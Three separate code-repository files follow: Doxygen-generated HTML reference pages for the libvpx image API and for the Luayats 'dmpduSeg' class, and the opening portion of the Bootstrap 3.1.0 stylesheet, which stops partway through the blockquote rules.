id="a7a30a7bff7400fb83ad45fede5077193a7801d709598e8aa57a811ef008389fac"></a>VPX_IMG_FMT_RGB555</em>&nbsp;</td><td class="fielddoc"> <p>16 bit per pixel, 555 </p> </td></tr> <tr><td class="fieldname"><em><a class="anchor" id="a7a30a7bff7400fb83ad45fede5077193aaac20056f1282ec3e23b2f3df5197ebd"></a>VPX_IMG_FMT_UYVY</em>&nbsp;</td><td class="fielddoc"> <p>UYVY packed YUV </p> </td></tr> <tr><td class="fieldname"><em><a class="anchor" id="a7a30a7bff7400fb83ad45fede5077193a54251eea14c31a916a9181d8e38bcc2e"></a>VPX_IMG_FMT_YUY2</em>&nbsp;</td><td class="fielddoc"> <p>YUYV packed YUV </p> </td></tr> <tr><td class="fieldname"><em><a class="anchor" id="a7a30a7bff7400fb83ad45fede5077193a6982ba2da461ca8d7b7a8a2efd018dea"></a>VPX_IMG_FMT_YVYU</em>&nbsp;</td><td class="fielddoc"> <p>YVYU packed YUV </p> </td></tr> <tr><td class="fieldname"><em><a class="anchor" id="a7a30a7bff7400fb83ad45fede5077193a5c585a577f88505845496cba7054a412"></a>VPX_IMG_FMT_BGR24</em>&nbsp;</td><td class="fielddoc"> <p>24 bit per pixel packed BGR </p> </td></tr> <tr><td class="fieldname"><em><a class="anchor" id="a7a30a7bff7400fb83ad45fede5077193a289f1c915217fd690228890db7033303"></a>VPX_IMG_FMT_RGB32_LE</em>&nbsp;</td><td class="fielddoc"> <p>32 bit packed BGR0 </p> </td></tr> <tr><td class="fieldname"><em><a class="anchor" id="a7a30a7bff7400fb83ad45fede5077193a62257fab5e53c2c1b589e4befbaa4643"></a>VPX_IMG_FMT_ARGB</em>&nbsp;</td><td class="fielddoc"> <p>32 bit packed ARGB, alpha=255 </p> </td></tr> <tr><td class="fieldname"><em><a class="anchor" id="a7a30a7bff7400fb83ad45fede5077193a933ca0d3511dccb7128a010c9443f13b"></a>VPX_IMG_FMT_ARGB_LE</em>&nbsp;</td><td class="fielddoc"> <p>32 bit packed BGRA, alpha=255 </p> </td></tr> <tr><td class="fieldname"><em><a class="anchor" id="a7a30a7bff7400fb83ad45fede5077193ae1040770cb4f2b60931e1b0d31c39c8a"></a>VPX_IMG_FMT_RGB565_LE</em>&nbsp;</td><td class="fielddoc"> <p>16 bit per pixel, gggbbbbb rrrrrggg </p> </td></tr> <tr><td class="fieldname"><em><a class="anchor" id="a7a30a7bff7400fb83ad45fede5077193ac79b2394abe0cc6c9068b7ef0007d74e"></a>VPX_IMG_FMT_RGB555_LE</em>&nbsp;</td><td class="fielddoc"> <p>16 bit per pixel, gggbbbbb 0rrrrrgg </p> </td></tr> <tr><td class="fieldname"><em><a class="anchor" id="a7a30a7bff7400fb83ad45fede5077193a6e4e8961bbcf96478c300dc4c3e1dc18"></a>VPX_IMG_FMT_YV12</em>&nbsp;</td><td class="fielddoc"> <p>Image is a planar format V plane precedes U plane in memory planar YVU </p> </td></tr> <tr><td class="fieldname"><em><a class="anchor" id="a7a30a7bff7400fb83ad45fede5077193af17ce49c9a6efd7c8c8ea8928d4ce26c"></a>VPX_IMG_FMT_I420</em>&nbsp;</td><td class="fielddoc"> <p>Image is a planar format </p> </td></tr> <tr><td class="fieldname"><em><a class="anchor" id="a7a30a7bff7400fb83ad45fede5077193a63e1daa51719dc6129881abe81a016fc"></a>VPX_IMG_FMT_VPXYV12</em>&nbsp;</td><td class="fielddoc"> <p>Image is a planar format V plane precedes U plane in memory </p> </td></tr> <tr><td class="fieldname"><em><a class="anchor" id="a7a30a7bff7400fb83ad45fede5077193a42d26966faf7079e80cbbfee1d698493"></a>VPX_IMG_FMT_VPXI420</em>&nbsp;</td><td class="fielddoc"> <p>&lt; planar 4:2:0 format with vpx color space Image is a planar format </p> </td></tr> </table> </div> </div> <h2 class="groupheader">Function Documentation</h2> <a class="anchor" id="ab80398f28ca880368a922fa979eb66c1"></a> <div class="memitem"> <div class="memproto"> <table class="memname"> <tr> <td class="memname"><a class="el" href="vpx__image_8h.html#abf5ac962cc6d71b4f0e39b1b0d033e55">vpx_image_t</a>* vpx_img_alloc </td> <td>(</td> <td class="paramtype"><a class="el" href="vpx__image_8h.html#abf5ac962cc6d71b4f0e39b1b0d033e55">vpx_image_t</a> *&#160;</td> <td class="paramname"><em>img</em>, </td> </tr> <tr> <td class="paramkey"></td> <td></td> <td class="paramtype"><a class="el" href="vpx__image_8h.html#acb76f0439d5d186256371aadf3beeee4">vpx_img_fmt_t</a>&#160;</td> <td class="paramname"><em>fmt</em>, </td> </tr> <tr> <td class="paramkey"></td> <td></td> <td class="paramtype">unsigned int&#160;</td> <td class="paramname"><em>d_w</em>, </td> </tr> <tr> <td class="paramkey"></td> <td></td> <td class="paramtype">unsigned int&#160;</td> <td class="paramname"><em>d_h</em>, </td> </tr> <tr> <td class="paramkey"></td> <td></td> <td class="paramtype">unsigned int&#160;</td> <td class="paramname"><em>align</em>&#160;</td> </tr> <tr> <td></td> <td>)</td> <td></td><td></td> </tr> </table> </div><div class="memdoc"> <p>Open a descriptor, allocating storage for the underlying image. </p> <pre class="fragment"> Returns a descriptor for storing an image of the given format. The storage for the descriptor is allocated on the heap. </pre><dl class="params"><dt>Parameters</dt><dd> <table class="params"> <tr><td class="paramdir">[in]</td><td class="paramname">img</td><td>Pointer to storage for descriptor. If this parameter is NULL, the storage for the descriptor will be allocated on the heap. </td></tr> <tr><td class="paramdir">[in]</td><td class="paramname">fmt</td><td>Format for the image </td></tr> <tr><td class="paramdir">[in]</td><td class="paramname">d_w</td><td>Width of the image </td></tr> <tr><td class="paramdir">[in]</td><td class="paramname">d_h</td><td>Height of the image </td></tr> <tr><td class="paramdir">[in]</td><td class="paramname">align</td><td>Alignment, in bytes, of the image buffer and each row in the image(stride).</td></tr> </table> </dd> </dl> <dl class="section return"><dt>Returns</dt><dd>Returns a pointer to the initialized image descriptor. If the img parameter is non-null, the value of the img parameter will be returned. </dd></dl> </div> </div> <a class="anchor" id="afaf35f1f2f2f634de394faf7d6aeeeb9"></a> <div class="memitem"> <div class="memproto"> <table class="memname"> <tr> <td class="memname"><a class="el" href="vpx__image_8h.html#abf5ac962cc6d71b4f0e39b1b0d033e55">vpx_image_t</a>* vpx_img_wrap </td> <td>(</td> <td class="paramtype"><a class="el" href="vpx__image_8h.html#abf5ac962cc6d71b4f0e39b1b0d033e55">vpx_image_t</a> *&#160;</td> <td class="paramname"><em>img</em>, </td> </tr> <tr> <td class="paramkey"></td> <td></td> <td class="paramtype"><a class="el" href="vpx__image_8h.html#acb76f0439d5d186256371aadf3beeee4">vpx_img_fmt_t</a>&#160;</td> <td class="paramname"><em>fmt</em>, </td> </tr> <tr> <td class="paramkey"></td> <td></td> <td class="paramtype">unsigned int&#160;</td> <td class="paramname"><em>d_w</em>, </td> </tr> <tr> <td class="paramkey"></td> <td></td> <td class="paramtype">unsigned int&#160;</td> <td class="paramname"><em>d_h</em>, </td> </tr> <tr> <td class="paramkey"></td> <td></td> <td class="paramtype">unsigned int&#160;</td> <td class="paramname"><em>align</em>, </td> </tr> <tr> <td class="paramkey"></td> <td></td> <td class="paramtype">unsigned char *&#160;</td> <td class="paramname"><em>img_data</em>&#160;</td> </tr> <tr> <td></td> <td>)</td> <td></td><td></td> </tr> </table> </div><div class="memdoc"> <p>Open a descriptor, using existing storage for the underlying image. </p> <pre class="fragment"> Returns a descriptor for storing an image of the given format. The storage for descriptor has been allocated elsewhere, and a descriptor is desired to "wrap" that storage. </pre><dl class="params"><dt>Parameters</dt><dd> <table class="params"> <tr><td class="paramdir">[in]</td><td class="paramname">img</td><td>Pointer to storage for descriptor. If this parameter is NULL, the storage for the descriptor will be allocated on the heap. </td></tr> <tr><td class="paramdir">[in]</td><td class="paramname">fmt</td><td>Format for the image </td></tr> <tr><td class="paramdir">[in]</td><td class="paramname">d_w</td><td>Width of the image </td></tr> <tr><td class="paramdir">[in]</td><td class="paramname">d_h</td><td>Height of the image </td></tr> <tr><td class="paramdir">[in]</td><td class="paramname">align</td><td>Alignment, in bytes, of each row in the image. </td></tr> <tr><td class="paramdir">[in]</td><td class="paramname">img_data</td><td>Storage to use for the image</td></tr> </table> </dd> </dl> <dl class="section return"><dt>Returns</dt><dd>Returns a pointer to the initialized image descriptor. If the img parameter is non-null, the value of the img parameter will be returned. </dd></dl> </div> </div> <a class="anchor" id="ab5c1d1a5548752f7cd5047f43d5f25c4"></a> <div class="memitem"> <div class="memproto"> <table class="memname"> <tr> <td class="memname">int vpx_img_set_rect </td> <td>(</td> <td class="paramtype"><a class="el" href="vpx__image_8h.html#abf5ac962cc6d71b4f0e39b1b0d033e55">vpx_image_t</a> *&#160;</td> <td class="paramname"><em>img</em>, </td> </tr> <tr> <td class="paramkey"></td> <td></td> <td class="paramtype">unsigned int&#160;</td> <td class="paramname"><em>x</em>, </td> </tr> <tr> <td class="paramkey"></td> <td></td> <td class="paramtype">unsigned int&#160;</td> <td class="paramname"><em>y</em>, </td> </tr> <tr> <td class="paramkey"></td> <td></td> <td class="paramtype">unsigned int&#160;</td> <td class="paramname"><em>w</em>, </td> </tr> <tr> <td class="paramkey"></td> <td></td> <td class="paramtype">unsigned int&#160;</td> <td class="paramname"><em>h</em>&#160;</td> </tr> <tr> <td></td> <td>)</td> <td></td><td></td> </tr> </table> </div><div class="memdoc"> <p>Set the rectangle identifying the displayed portion of the image. </p> <pre class="fragment"> Updates the displayed rectangle (aka viewport) on the image surface to match the specified coordinates and size. </pre><dl class="params"><dt>Parameters</dt><dd> <table class="params"> <tr><td class="paramdir">[in]</td><td class="paramname">img</td><td>Image descriptor </td></tr> <tr><td class="paramdir">[in]</td><td class="paramname">x</td><td>leftmost column </td></tr> <tr><td class="paramdir">[in]</td><td class="paramname">y</td><td>topmost row </td></tr> <tr><td class="paramdir">[in]</td><td class="paramname">w</td><td>width </td></tr> <tr><td class="paramdir">[in]</td><td class="paramname">h</td><td>height</td></tr> </table> </dd> </dl> <dl class="section return"><dt>Returns</dt><dd>0 if the requested rectangle is valid, nonzero otherwise. </dd></dl> </div> </div> <a class="anchor" id="a01201327328c1cdd365632e5056b1850"></a> <div class="memitem"> <div class="memproto"> <table class="memname"> <tr> <td class="memname">void vpx_img_flip </td> <td>(</td> <td class="paramtype"><a class="el" href="vpx__image_8h.html#abf5ac962cc6d71b4f0e39b1b0d033e55">vpx_image_t</a> *&#160;</td> <td class="paramname"><em>img</em></td><td>)</td> <td></td> </tr> </table> </div><div class="memdoc"> <p>Flip the image vertically (top for bottom) </p> <pre class="fragment"> Adjusts the image descriptor's pointers and strides to make the image be referenced upside-down. </pre><dl class="params"><dt>Parameters</dt><dd> <table class="params"> <tr><td class="paramdir">[in]</td><td class="paramname">img</td><td>Image descriptor </td></tr> </table> </dd> </dl> </div> </div> <a class="anchor" id="af47ebaf286812d037425d41990d48a17"></a> <div class="memitem"> <div class="memproto"> <table class="memname"> <tr> <td class="memname">void vpx_img_free </td> <td>(</td> <td class="paramtype"><a class="el" href="vpx__image_8h.html#abf5ac962cc6d71b4f0e39b1b0d033e55">vpx_image_t</a> *&#160;</td> <td class="paramname"><em>img</em></td><td>)</td> <td></td> </tr> </table> </div><div class="memdoc"> <p>Close an image descriptor. </p> <pre class="fragment"> Frees all allocated storage associated with an image descriptor. </pre><dl class="params"><dt>Parameters</dt><dd> <table class="params"> <tr><td class="paramdir">[in]</td><td class="paramname">img</td><td>Image descriptor </td></tr> </table> </dd> </dl> </div> </div> </div><!-- contents --> <!-- start footer part --> <hr class="footer"/><address class="footer"><small> Generated on Wed Jul 31 2013 14:58:50 for WebM VP8 Codec SDK by &#160;<a href="http://www.doxygen.org/index.html"> <img class="footer" src="doxygen.png" alt="doxygen"/> </a> 1.8.3.1 </small></address> </body> </html>
doc/cpp/html/classdmpduSeg.html
hleuwer/luayats
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/xhtml;charset=UTF-8"/> <title>Luayats: dmpduSeg Class Reference</title> <link href="tabs.css" rel="stylesheet" type="text/css"/> <link href="doxygen.css" rel="stylesheet" type="text/css"/> </head> <body> <!-- Generated by Doxygen 1.6.1 --> <div class="navigation" id="top"> <div class="tabs"> <ul> <li><a href="index.html"><span>Main&nbsp;Page</span></a></li> <li class="current"><a href="annotated.html"><span>Classes</span></a></li> <li><a href="files.html"><span>Files</span></a></li> </ul> </div> <div class="tabs"> <ul> <li><a href="annotated.html"><span>Class&nbsp;List</span></a></li> <li><a href="classes.html"><span>Class&nbsp;Index</span></a></li> <li><a href="hierarchy.html"><span>Class&nbsp;Hierarchy</span></a></li> <li><a href="functions.html"><span>Class&nbsp;Members</span></a></li> </ul> </div> </div> <div class="contents"> <h1>dmpduSeg Class Reference</h1><!-- doxytag: class="dmpduSeg" --><!-- doxytag: inherits="data" --> <p><code>#include &lt;<a class="el" href="data_8h_source.html">data.h</a>&gt;</code></p> <div class="dynheader"> Inheritance diagram for dmpduSeg:</div> <div class="dynsection"> <div class="center"> <img src="classdmpduSeg.gif" usemap="#dmpduSeg_map" alt=""/> <map id="dmpduSeg_map" name="dmpduSeg_map"> <area href="classdata.html" alt="data" shape="rect" coords="0,0,71,24"/> </map> </div> </div> <p><a href="classdmpduSeg-members.html">List of all members.</a></p> <table border="0" cellpadding="0" cellspacing="0"> <tr><td colspan="2"><h2>Public Member Functions</h2></td></tr> <tr><td class="memItemLeft" align="right" valign="top">&nbsp;</td><td class="memItemRight" valign="bottom"><a class="el" href="classdmpduSeg.html#abcf9a154245701839345b2ce7aa89418">BASECLASS</a> (<a class="el" href="classdata.html">data</a>)</td></tr> <tr><td class="memItemLeft" align="right" valign="top">&nbsp;</td><td class="memItemRight" valign="bottom"><a class="el" href="classdmpduSeg.html#aea2ebfe5faa9eb70fc302f0309ecd5c5">CLASS_KEY</a> (DMPDUSegType)</td></tr> <tr><td class="memItemLeft" align="right" valign="top">&nbsp;</td><td class="memItemRight" valign="bottom"><a class="el" href="classdmpduSeg.html#a20af318b7641ff1b7e5f612dbcacfdbe">NEW_DELETE</a> (10000)</td></tr> <tr><td class="memItemLeft" align="right" valign="top">&nbsp;</td><td class="memItemRight" valign="bottom"><a class="el" href="classdmpduSeg.html#a68261ef5146830e4386bddf0eda78f05">dmpduSeg</a> (int i)</td></tr> <tr><td class="memItemLeft" align="right" valign="top">size_t&nbsp;</td><td class="memItemRight" valign="bottom"><a class="el" href="classdmpduSeg.html#ad4c7806427e0caf0a49affc5df2c81ef">pdu_len</a> ()</td></tr> <tr><td class="memItemLeft" align="right" valign="top">&nbsp;</td><td class="memItemRight" valign="bottom"><a class="el" href="classdmpduSeg.html#a2b6ed08d1e1b2308dff3d0214e21dd3b">CLONE</a> (<a class="el" href="classdmpduSeg.html">dmpduSeg</a>)</td></tr> <tr><td colspan="2"><h2>Public Attributes</h2></td></tr> <tr><td class="memItemLeft" align="right" valign="top">int&nbsp;</td><td class="memItemRight" valign="bottom"><a class="el" href="classdmpduSeg.html#a32c2e6073eb27f76b979ce10e28cbd6b">sdu_seq</a></td></tr> <tr><td class="memItemLeft" align="right" valign="top">int&nbsp;</td><td class="memItemRight" valign="bottom"><a class="el" href="classdmpduSeg.html#a84a75b132ee959b32a416bbab79fb332">seg_seq</a></td></tr> <tr><td class="memItemLeft" align="right" valign="top">int&nbsp;</td><td class="memItemRight" valign="bottom"><a class="el" href="classdmpduSeg.html#a38a14386a3a721a46a5654a06a9df201">first_seg</a></td></tr> <tr><td class="memItemLeft" align="right" valign="top">int&nbsp;</td><td class="memItemRight" valign="bottom"><a class="el" href="classdmpduSeg.html#ab4564714b0639657a7b74688a25c813a">pt</a></td></tr> <tr><td class="memItemLeft" align="right" valign="top">int&nbsp;</td><td class="memItemRight" valign="bottom"><a class="el" href="classdmpduSeg.html#a95c6b42ff723b3fb349040acc95e1f4a">connID</a></td></tr> </table> <hr/><h2>Constructor &amp; Destructor Documentation</h2> <a class="anchor" id="a68261ef5146830e4386bddf0eda78f05"></a><!-- doxytag: member="dmpduSeg::dmpduSeg" ref="a68261ef5146830e4386bddf0eda78f05" args="(int i)" --> <div class="memitem"> <div class="memproto"> <table class="memname"> <tr> <td class="memname">dmpduSeg::dmpduSeg </td> <td>(</td> <td class="paramtype">int&nbsp;</td> <td class="paramname"> <em>i</em></td> <td>&nbsp;)&nbsp;</td> <td><code> [inline]</code></td> </tr> </table> </div> <div class="memdoc"> </div> </div> <hr/><h2>Member Function Documentation</h2> <a class="anchor" id="abcf9a154245701839345b2ce7aa89418"></a><!-- doxytag: member="dmpduSeg::BASECLASS" ref="abcf9a154245701839345b2ce7aa89418" args="(data)" --> <div class="memitem"> <div class="memproto"> <table class="memname"> <tr> <td class="memname">dmpduSeg::BASECLASS </td> <td>(</td> <td class="paramtype"><a class="el" href="classdata.html">data</a>&nbsp;</td> <td class="paramname"></td> <td>&nbsp;)&nbsp;</td> <td></td> </tr> </table> </div> <div class="memdoc"> </div> </div> <a class="anchor" id="aea2ebfe5faa9eb70fc302f0309ecd5c5"></a><!-- doxytag: member="dmpduSeg::CLASS_KEY" ref="aea2ebfe5faa9eb70fc302f0309ecd5c5" args="(DMPDUSegType)" --> <div class="memitem"> <div class="memproto"> <table class="memname"> <tr> <td class="memname">dmpduSeg::CLASS_KEY </td> <td>(</td> <td class="paramtype">DMPDUSegType&nbsp;</td> <td class="paramname"></td> <td>&nbsp;)&nbsp;</td> <td></td> </tr> </table> </div> <div class="memdoc"> </div> </div> <a class="anchor" id="a2b6ed08d1e1b2308dff3d0214e21dd3b"></a><!-- doxytag: member="dmpduSeg::CLONE" ref="a2b6ed08d1e1b2308dff3d0214e21dd3b" args="(dmpduSeg)" --> <div class="memitem"> <div class="memproto"> <table class="memname"> <tr> <td class="memname">dmpduSeg::CLONE </td> <td>(</td> <td class="paramtype"><a class="el" href="classdmpduSeg.html">dmpduSeg</a>&nbsp;</td> <td class="paramname"></td> <td>&nbsp;)&nbsp;</td> <td></td> </tr> </table> </div> <div class="memdoc"> <p>Reimplemented from <a class="el" href="classdata.html#a1664b5f0d33590e409df40ba07297884">data</a>.</p> </div> </div> <a class="anchor" id="a20af318b7641ff1b7e5f612dbcacfdbe"></a><!-- doxytag: member="dmpduSeg::NEW_DELETE" ref="a20af318b7641ff1b7e5f612dbcacfdbe" args="(10000)" --> <div class="memitem"> <div class="memproto"> <table class="memname"> <tr> <td class="memname">dmpduSeg::NEW_DELETE </td> <td>(</td> <td class="paramtype">10000&nbsp;</td> <td class="paramname"></td> <td>&nbsp;)&nbsp;</td> <td></td> </tr> </table> </div> <div class="memdoc"> <p>Reimplemented from <a class="el" href="classdata.html#a9f8962171552246490254b49228fde9f">data</a>.</p> </div> </div> <a class="anchor" id="ad4c7806427e0caf0a49affc5df2c81ef"></a><!-- doxytag: member="dmpduSeg::pdu_len" ref="ad4c7806427e0caf0a49affc5df2c81ef" args="()" --> <div class="memitem"> <div class="memproto"> <table class="memname"> <tr> <td class="memname">size_t dmpduSeg::pdu_len </td> <td>(</td> <td class="paramname"></td> <td>&nbsp;)&nbsp;</td> <td><code> [inline, virtual]</code></td> </tr> </table> </div> <div class="memdoc"> <p>Reimplemented from <a class="el" href="classdata.html#a297a8c9b62cafe6cab82ac5203df6a72">data</a>.</p> </div> </div> <hr/><h2>Member Data Documentation</h2> <a class="anchor" id="a95c6b42ff723b3fb349040acc95e1f4a"></a><!-- doxytag: member="dmpduSeg::connID" ref="a95c6b42ff723b3fb349040acc95e1f4a" args="" --> <div class="memitem"> <div class="memproto"> <table class="memname"> <tr> <td class="memname">int <a class="el" href="classdmpduSeg.html#a95c6b42ff723b3fb349040acc95e1f4a">dmpduSeg::connID</a></td> </tr> </table> </div> <div class="memdoc"> </div> </div> <a class="anchor" id="a38a14386a3a721a46a5654a06a9df201"></a><!-- doxytag: member="dmpduSeg::first_seg" ref="a38a14386a3a721a46a5654a06a9df201" args="" --> <div class="memitem"> <div class="memproto"> <table class="memname"> <tr> <td class="memname">int <a class="el" href="classdmpduSeg.html#a38a14386a3a721a46a5654a06a9df201">dmpduSeg::first_seg</a></td> </tr> </table> </div> <div class="memdoc"> </div> </div> <a class="anchor" id="ab4564714b0639657a7b74688a25c813a"></a><!-- doxytag: member="dmpduSeg::pt" ref="ab4564714b0639657a7b74688a25c813a" args="" --> <div class="memitem"> <div class="memproto"> <table class="memname"> <tr> <td class="memname">int <a class="el" href="classdmpduSeg.html#ab4564714b0639657a7b74688a25c813a">dmpduSeg::pt</a></td> </tr> </table> </div> <div class="memdoc"> </div> </div> <a class="anchor" id="a32c2e6073eb27f76b979ce10e28cbd6b"></a><!-- doxytag: member="dmpduSeg::sdu_seq" ref="a32c2e6073eb27f76b979ce10e28cbd6b" args="" --> <div class="memitem"> <div class="memproto"> <table class="memname"> <tr> <td class="memname">int <a class="el" href="classdmpduSeg.html#a32c2e6073eb27f76b979ce10e28cbd6b">dmpduSeg::sdu_seq</a></td> </tr> </table> </div> <div class="memdoc"> </div> </div> <a class="anchor" id="a84a75b132ee959b32a416bbab79fb332"></a><!-- doxytag: member="dmpduSeg::seg_seq" ref="a84a75b132ee959b32a416bbab79fb332" args="" --> <div class="memitem"> <div class="memproto"> <table class="memname"> <tr> <td class="memname">int <a class="el" href="classdmpduSeg.html#a84a75b132ee959b32a416bbab79fb332">dmpduSeg::seg_seq</a></td> </tr> </table> </div> <div class="memdoc"> </div> </div> <hr/>The documentation for this class was generated from the following file:<ul> <li>src/kernel/<a class="el" href="data_8h_source.html">data.h</a></li> </ul> </div> <hr size="1"/><address style="text-align: right;"><small>Generated on Sun Feb 14 12:32:10 2010 for Luayats by&nbsp; <a href="http://www.doxygen.org/index.html"> <img class="footer" src="doxygen.png" alt="doxygen"/></a> 1.6.1 </small></address> </body> </html>
BShare/public/css/bootstrap.css
NonoDev/BShare
/*! * Bootstrap v3.1.0 (http://getbootstrap.com) * Copyright 2011-2014 Twitter, Inc. * Licensed under MIT (https://github.com/twbs/bootstrap/blob/master/LICENSE) */ /*! normalize.css v3.0.0 | MIT License | git.io/normalize */ html { font-family: sans-serif; -webkit-text-size-adjust: 100%; -ms-text-size-adjust: 100%; } body { margin: 0; } article, aside, details, figcaption, figure, footer, header, hgroup, main, nav, section, summary { display: block; } audio, canvas, progress, video { display: inline-block; vertical-align: baseline; } audio:not([controls]) { display: none; height: 0; } [hidden], template { display: none; } a { background: transparent; } a:active, a:hover { outline: 0; } abbr[title] { border-bottom: 1px dotted; } b, strong { font-weight: bold; } dfn { font-style: italic; } h1 { margin: .67em 0; font-size: 2em; } mark { color: #000; background: #ff0; } small { font-size: 80%; } sub, sup { position: relative; font-size: 75%; line-height: 0; vertical-align: baseline; } sup { top: -.5em; } sub { bottom: -.25em; } img { border: 0; } svg:not(:root) { overflow: hidden; } figure { margin: 1em 40px; } hr { height: 0; -moz-box-sizing: content-box; box-sizing: content-box; } pre { overflow: auto; } code, kbd, pre, samp { font-family: monospace, monospace; font-size: 1em; } button, input, optgroup, select, textarea { margin: 0; font: inherit; color: inherit; } button { overflow: visible; } button, select { text-transform: none; } button, html input[type="button"], input[type="reset"], input[type="submit"] { -webkit-appearance: button; cursor: pointer; } button[disabled], html input[disabled] { cursor: default; } button::-moz-focus-inner, input::-moz-focus-inner { padding: 0; border: 0; } input { line-height: normal; } input[type="checkbox"], input[type="radio"] { box-sizing: border-box; padding: 0; } input[type="number"]::-webkit-inner-spin-button, input[type="number"]::-webkit-outer-spin-button { height: auto; } input[type="search"] { -webkit-box-sizing: content-box; -moz-box-sizing: content-box; box-sizing: content-box; -webkit-appearance: textfield; } input[type="search"]::-webkit-search-cancel-button, input[type="search"]::-webkit-search-decoration { -webkit-appearance: none; } fieldset { padding: .35em .625em .75em; margin: 0 2px; border: 1px solid #c0c0c0; } legend { padding: 0; border: 0; } textarea { overflow: auto; } optgroup { font-weight: bold; } table { border-spacing: 0; border-collapse: collapse; } td, th { padding: 0; } @media print { * { color: #000 !important; text-shadow: none !important; background: transparent !important; box-shadow: none !important; } a, a:visited { text-decoration: underline; } a[href]:after { content: " (" attr(href) ")"; } abbr[title]:after { content: " (" attr(title) ")"; } a[href^="javascript:"]:after, a[href^="#"]:after { content: ""; } pre, blockquote { border: 1px solid #999; page-break-inside: avoid; } thead { display: table-header-group; } tr, img { page-break-inside: avoid; } img { max-width: 100% !important; } p, h2, h3 { orphans: 3; widows: 3; } h2, h3 { page-break-after: avoid; } select { background: #fff !important; } .navbar { display: none; } .table td, .table th { background-color: #fff !important; } .btn > .caret, .dropup > .btn > .caret { border-top-color: #000 !important; } .label { border: 1px solid #000; } .table { border-collapse: collapse !important; } .table-bordered th, .table-bordered td { border: 1px solid #ddd !important; } } * { -webkit-box-sizing: border-box; -moz-box-sizing: border-box; box-sizing: border-box; } *:before, *:after { -webkit-box-sizing: border-box; -moz-box-sizing: border-box; box-sizing: border-box; } html { font-size: 62.5%; -webkit-tap-highlight-color: rgba(0, 0, 0, 0); } body { font-family: "Helvetica Neue", Helvetica, Arial, sans-serif; font-size: 14px; line-height: 1.428571429; color: #333; background-color: #fff; } input, button, select, textarea { font-family: inherit; font-size: inherit; line-height: inherit; } a { color: #428bca; text-decoration: none; } a:hover, a:focus { color: #2a6496; text-decoration: underline; } a:focus { outline: thin dotted; outline: 5px auto -webkit-focus-ring-color; outline-offset: -2px; } figure { margin: 0; } img { vertical-align: middle; } .img-responsive { display: block; max-width: 100%; height: auto; } .img-rounded { border-radius: 6px; } .img-thumbnail { display: inline-block; max-width: 100%; height: auto; padding: 4px; line-height: 1.428571429; background-color: #fff; border: 1px solid #ddd; border-radius: 4px; -webkit-transition: all .2s ease-in-out; transition: all .2s ease-in-out; } .img-circle { border-radius: 50%; } hr { margin-top: 20px; margin-bottom: 20px; border: 0; border-top: 1px solid #eee; } .sr-only { position: absolute; width: 1px; height: 1px; padding: 0; margin: -1px; overflow: hidden; clip: rect(0, 0, 0, 0); border: 0; } h1, h2, h3, h4, h5, h6, .h1, .h2, .h3, .h4, .h5, .h6 { font-family: inherit; font-weight: 500; line-height: 1.1; color: inherit; } h1 small, h2 small, h3 small, h4 small, h5 small, h6 small, .h1 small, .h2 small, .h3 small, .h4 small, .h5 small, .h6 small, h1 .small, h2 .small, h3 .small, h4 .small, h5 .small, h6 .small, .h1 .small, .h2 .small, .h3 .small, .h4 .small, .h5 .small, .h6 .small { font-weight: normal; line-height: 1; color: #999; } h1, .h1, h2, .h2, h3, .h3 { margin-top: 20px; margin-bottom: 10px; } h1 small, .h1 small, h2 small, .h2 small, h3 small, .h3 small, h1 .small, .h1 .small, h2 .small, .h2 .small, h3 .small, .h3 .small { font-size: 65%; } h4, .h4, h5, .h5, h6, .h6 { margin-top: 10px; margin-bottom: 10px; } h4 small, .h4 small, h5 small, .h5 small, h6 small, .h6 small, h4 .small, .h4 .small, h5 .small, .h5 .small, h6 .small, .h6 .small { font-size: 75%; } h1, .h1 { font-size: 36px; } h2, .h2 { font-size: 30px; } h3, .h3 { font-size: 24px; } h4, .h4 { font-size: 18px; } h5, .h5 { font-size: 14px; } h6, .h6 { font-size: 12px; } p { margin: 0 0 10px; } .lead { margin-bottom: 20px; font-size: 16px; font-weight: 200; line-height: 1.4; } @media (min-width: 768px) { .lead { font-size: 21px; } } small, .small { font-size: 85%; } cite { font-style: normal; } .text-left { text-align: left; } .text-right { text-align: right; } .text-center { text-align: center; } .text-justify { text-align: justify; } .text-muted { color: #999; } .text-primary { color: #428bca; } a.text-primary:hover { color: #3071a9; } .text-success { color: #3c763d; } a.text-success:hover { color: #2b542c; } .text-info { color: #31708f; } a.text-info:hover { color: #245269; } .text-warning { color: #8a6d3b; } a.text-warning:hover { color: #66512c; } .text-danger { color: #a94442; } a.text-danger:hover { color: #843534; } .bg-primary { color: #fff; background-color: #428bca; } a.bg-primary:hover { background-color: #3071a9; } .bg-success { background-color: #dff0d8; } a.bg-success:hover { background-color: #c1e2b3; } .bg-info { background-color: #d9edf7; } a.bg-info:hover { background-color: #afd9ee; } .bg-warning { background-color: #fcf8e3; } a.bg-warning:hover { background-color: #f7ecb5; } .bg-danger { background-color: #f2dede; } a.bg-danger:hover { background-color: #e4b9b9; } .page-header { padding-bottom: 9px; margin: 40px 0 20px; border-bottom: 1px solid #eee; } ul, ol { margin-top: 0; margin-bottom: 10px; } ul ul, ol ul, ul ol, ol ol { margin-bottom: 0; } .list-unstyled { padding-left: 0; list-style: none; } .list-inline { padding-left: 0; list-style: none; } .list-inline > li { display: inline-block; padding-right: 5px; padding-left: 5px; } .list-inline > li:first-child { padding-left: 0; } dl { margin-top: 0; margin-bottom: 20px; } dt, dd { line-height: 1.428571429; } dt { font-weight: bold; } dd { margin-left: 0; } @media (min-width: 768px) { .dl-horizontal dt { float: left; width: 160px; overflow: hidden; clear: left; text-align: right; text-overflow: ellipsis; white-space: nowrap; } .dl-horizontal dd { margin-left: 180px; } } abbr[title], abbr[data-original-title] { cursor: help; border-bottom: 1px dotted #999; } .initialism { font-size: 90%; text-transform: uppercase; } blockquote { padding: 10px 20px; margin: 0 0 20px; font-size: 17.5px; border-left: 5px solid #eee; } blockquote p:last-child, blockquote ul:last-child, blockquote ol:last-child { margin-bottom: 0; } blockquote footer, blockquote small, blockquote .small { display: block; font-size: 80%; line-height: 1.428571429; color: #999; } blockquote footer:before, blockquote small:before, blockquote .small:before { content: '\2014 \00A0'; } .blockquote-reverse, blockquote.pull-right { padding-right: 15px; padding-left: 0; text-align: right; border-right: 5px solid #eee; border-left: 0; } .blockquote-reverse footer:before, blockquote.pull-right footer:before, .blockquote-reverse small:before, blockquote.pull-right small:before, 